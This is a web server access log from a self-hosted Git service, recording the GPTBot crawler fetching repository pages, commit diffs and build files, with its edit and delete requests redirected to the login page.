[Client 74.7.227.38] [Length 9935] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:16:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9938] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:16:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9938] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:16:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:16:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:16:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:16:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:16:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:16:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:16:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:16:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:16:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 20820] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:16:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 20830] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:16:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 11763] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" -[17/Feb/2026:16:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx%2fproxy_host%2f4.conf" [Client 74.7.227.38] [Length 23772] [Gzip 4.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx%2fproxy_host%2f1.conf" [Client 74.7.227.38] [Length 23968] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx%2fproxy_host%2f2.conf" [Client 74.7.227.38] [Length 23765] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2fnginx%2fproxy_host%2f3.conf" [Client 74.7.227.38] [Length 23997] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx%2fproxy_host%2f3.conf" [Client 74.7.227.38] [Length 24761] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11843] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11846] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11894] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:58:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" -[17/Feb/2026:16:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj" -[17/Feb/2026:16:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 37569] [Gzip 11.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" -[17/Feb/2026:16:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12400] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" -[17/Feb/2026:16:58:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" -[17/Feb/2026:16:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj" -[17/Feb/2026:16:58:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" -[17/Feb/2026:16:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest/obj" -[17/Feb/2026:16:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 9810] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" -[17/Feb/2026:16:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11897] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 25653] [Gzip 7.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:58:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:16:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:16:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29848] [Gzip 12.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:16:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29897] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:16:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29866] [Gzip 12.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:16:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 53066] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:16:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11751] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 9829] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:16:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:16:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 3399] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 49145] [Gzip 22.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:16:58:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 